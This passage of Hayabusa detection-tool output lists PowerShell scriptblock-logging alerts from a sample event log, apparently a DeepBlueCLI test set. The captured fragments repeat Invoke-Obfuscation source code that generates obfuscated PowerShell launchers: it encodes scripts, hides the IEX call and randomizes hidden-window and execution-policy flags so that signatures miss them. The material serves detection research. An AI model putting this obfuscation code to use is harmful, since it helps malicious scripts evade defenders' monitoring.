PwSh,"(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will iterate through each element of the array. $BaseScriptArray1 = ""`$$RandomScriptVar[0..(`$$RandomScriptVar.$Length-1)]"" # Generate random JOIN syntax for all above options. $NewScriptArray1 = @() $NewScriptArray1 += $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray1 += $Join + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray1 += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray1 += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript1 = (Get-Random -Input $NewScriptArray1) # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray2 = @() $BaseScriptArray2 += '(' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript1 + ' '*(Get-Random -Input @(0,1)) + "").$Trim("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar '"" + ' '*(Get-Random -Input @(0,1)) + "").$SplitMethod2("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DigitDelimiterChar + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray2 += ""`[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int[]]"" + ' '*(Get-Random -Input @(0,1)) + ""("" + ' '*(Get-Random -Input @(0,1)) + $NewScript1 + ' '*(Get-Random -Input @(0,1)) + "").$Trim("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar '"" + ' '*(Get-Random -Input @(0,1)) + "").$SplitMethod2("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray2 = (Get-Random -Input $BaseScriptArray2) # Generate random JOIN syntax for all above options. $NewScriptArray2 = @() $NewScriptArray2 += $BaseScriptArray2 + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray2 += $Join + ' '*(Get-Random -Input @(0,1)) + '(' + $BaseScriptArray2 + ')' $NewScriptArray2 += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray2 + ' '*(Get-Random -Input @(0,1)) + ')' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray2) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Insert)"" , ""''.Insert.ToString()"")) + '[' + (Get-Random -Input @(3,7,14,23,33)) + ',' + (Get-Random -Input @(10,26,41)) + "",27]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Normalize)"" , ""''.Normalize.ToString()"")) + '[' + (Get-Random -Input @(3,13,23,33,55,59,77)) + ',' + (Get-Random -Input @(15,35,41,45)) + "",46]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Chars)"" , ""''.Chars.ToString()"")) + '[' + (Get-Random -Input @(11,15)) + ',' + (Get-Random -Input @(18,24)) + "",19]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.SubString)"" , ""''.SubString.ToString()"")) + '[' + (Get-Random -Input @(3,13,17,26,37,47,51,60,67)) + ',' + (Get-Random -Input @(29,63,72)) + ',' + (Get-Random -Input @(30,64)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Remove)"" , ""''.Remove.ToString()"")) + '[' + (Get-Random -Input @(3,14,23,30,45,56,65)) + ',' + (Get-Random -Input @(8,12,26,50,54,68)) + ',' + (Get-Random -Input @(27,69)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.LastIndexOfAny)"" , ""''.LastIndexOfAny.ToString()"")) + '[' + (Get-Random -Input @(0,8,34,42,67,76,84,92,117,126,133)) + ',' + (Get-Random -Input @(11,45,79,95,129)) + ',' + (Get-Random -Input @(12,46,80,96,130)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.LastIndexOf)"" , ""''.LastIndexOf.ToString()"")) + '[' + (Get-Random -Input @(0,8,29,37,57,66,74,82,102,111,118,130,138,149,161,169,180,191,200,208,216,227,238,247,254,266,274,285,306,315,326,337,345,356,367,376,393,402,413,424,432,443,454,463,470,491,500,511)) + ',' + (Get-Random -Input @(11,25,40,54,69,85,99,114,141,157,172,188,203,219,235,250,277,293,300,333,348,364,379,387,420,435,451,466,485,518)) + ',' + (Get-Random -Input @(12,41,70,86,115,142,173,204,220,251,278,349,380,436,467)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IsNormalized)"" , ""''.IsNormalized.ToString()"")) + '[' + (Get-Random -Input @(5,13,26,34,57,61,75,79)) + ',' + (Get-Random -Input @(15,36,43,47)) + "",48]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IndexOfAny)"" , ""''.IndexOfAny.ToString()"")) + '[' + (Get-Random -Input @(0,4,30,34,59,68,76,80,105,114,121)) + ',' + (Get-Random -Input @(7,37,71,83,117)) + ',' + (Get-Random -Input @(8,38,72,84,118)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IndexOf)"" , ""''.IndexOf.ToString()"")) + '[' + (Get-Random -Input @(0,4,25,29,49,58,66,70,90,99,106,118,122,133,145,149,160,171,180,188,192,203,214,223,230,242,246,257,278,287,298,309,313,324,335,344,361,370,381,392,396,407,418,427,434,455,464,475)) + ',' + (Get-Random -Input @(7,21,32,46,61,73,87,102,125,141,152,168,183,195,211,226,249,265,272,305,316,332,347,355,388,399,415,430,449,482)) + ',' + (Get-Random -Input @(8,33,62,74,103,126,153,184,196,227,250,317,348,400,431)) + ""]-Join''"" + "")"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression # Randomly choose from above invoke operation syntaxes. $NewScript = (Get-Random -Input $InvokeOptions) # Reassemble all components of the final command. $NewScript = $ScriptStringPart1 + $NewScript + '}' # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(G",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.285 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will iterate through each element of the array. $BaseScriptArray1 = ""`$$RandomScriptVar[0..(`$$RandomScriptVar.$Length-1)]"" # Generate random JOIN syntax for all above options. $NewScriptArray1 = @() $NewScriptArray1 += $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray1 += $Join + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray1 += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray1 += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript1 = (Get-Random -Input $NewScriptArray1) # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray2 = @() $BaseScriptArray2 += '(' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript1 + ' '*(Get-Random -Input @(0,1)) + "").$Trim("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar '"" + ' '*(Get-Random -Input @(0,1)) + "").$SplitMethod2("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DigitDelimiterChar + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray2 += ""`[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int[]]"" + ' '*(Get-Random -Input @(0,1)) + ""("" + ' '*(Get-Random -Input @(0,1)) + $NewScript1 + ' '*(Get-Random -Input @(0,1)) + "").$Trim("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar '"" + ' '*(Get-Random -Input @(0,1)) + "").$SplitMethod2("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray2 = (Get-Random -Input $BaseScriptArray2) # Generate random JOIN syntax for all above options. $NewScriptArray2 = @() $NewScriptArray2 += $BaseScriptArray2 + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray2 += $Join + ' '*(Get-Random -Input @(0,1)) + '(' + $BaseScriptArray2 + ')' $NewScriptArray2 += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray2 + ' '*(Get-Random -Input @(0,1)) + ')' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray2) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Insert)"" , ""''.Insert.ToString()"")) + '[' + (Get-Random -Input @(3,7,14,23,33)) + ',' + (Get-Random -Input @(10,26,41)) + "",27]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Normalize)"" , ""''.Normalize.ToString()"")) + '[' + (Get-Random -Input @(3,13,23,33,55,59,77)) + ',' + (Get-Random -Input @(15,35,41,45)) + "",46]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Chars)"" , ""''.Chars.ToString()"")) + '[' + (Get-Random -Input @(11,15)) + ',' + (Get-Random -Input @(18,24)) + "",19]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.SubString)"" , ""''.SubString.ToString()"")) + '[' + (Get-Random -Input @(3,13,17,26,37,47,51,60,67)) + ',' + (Get-Random -Input @(29,63,72)) + ',' + (Get-Random -Input @(30,64)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Remove)"" , ""''.Remove.ToString()"")) + '[' + (Get-Random -Input @(3,14,23,30,45,56,65)) + ',' + (Get-Random -Input @(8,12,26,50,54,68)) + ',' + (Get-Random -Input @(27,69)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.LastIndexOfAny)"" , ""''.LastIndexOfAny.ToString()"")) + '[' + (Get-Random -Input @(0,8,34,42,67,76,84,92,117,126,133)) + ',' + (Get-Random -Input @(11,45,79,95,129)) + ',' + (Get-Random -Input @(12,46,80,96,130)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.LastIndexOf)"" , ""''.LastIndexOf.ToString()"")) + '[' + (Get-Random -Input @(0,8,29,37,57,66,74,82,102,111,118,130,138,149,161,169,180,191,200,208,216,227,238,247,254,266,274,285,306,315,326,337,345,356,367,376,393,402,413,424,432,443,454,463,470,491,500,511)) + ',' + (Get-Random -Input @(11,25,40,54,69,85,99,114,141,157,172,188,203,219,235,250,277,293,300,333,348,364,379,387,420,435,451,466,485,518)) + ',' + (Get-Random -Input @(12,41,70,86,115,142,173,204,220,251,278,349,380,436,467)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IsNormalized)"" , ""''.IsNormalized.ToString()"")) + '[' + (Get-Random -Input @(5,13,26,34,57,61,75,79)) + ',' + (Get-Random -Input @(15,36,43,47)) + "",48]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IndexOfAny)"" , ""''.IndexOfAny.ToString()"")) + '[' + (Get-Random -Input @(0,4,30,34,59,68,76,80,105,114,121)) + ',' + (Get-Random -Input @(7,37,71,83,117)) + ',' + (Get-Random -Input @(8,38,72,84,118)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IndexOf)"" , ""''.IndexOf.ToString()"")) + '[' + (Get-Random -Input @(0,4,25,29,49,58,66,70,90,99,106,118,122,133,145,149,160,171,180,188,192,203,214,223,230,242,246,257,278,287,298,309,313,324,335,344,361,370,381,392,396,407,418,427,434,455,464,475)) + ',' + (Get-Random -Input @(7,21,32,46,61,73,87,102,125,141,152,168,183,195,211,226,249,265,272,305,316,332,347,355,388,399,415,430,449,482)) + ',' + (Get-Random -Input @(8,33,62,74,103,126,153,184,196,227,250,317,348,400,431)) + ""]-Join''"" + "")"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression # Randomly choose from above invoke operation syntaxes. $NewScript = (Get-Random -Input $InvokeOptions) # Reassemble all components of the final command. $NewScript = $ScriptStringPart1 + $NewScript + '}' # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(G",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"et-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} 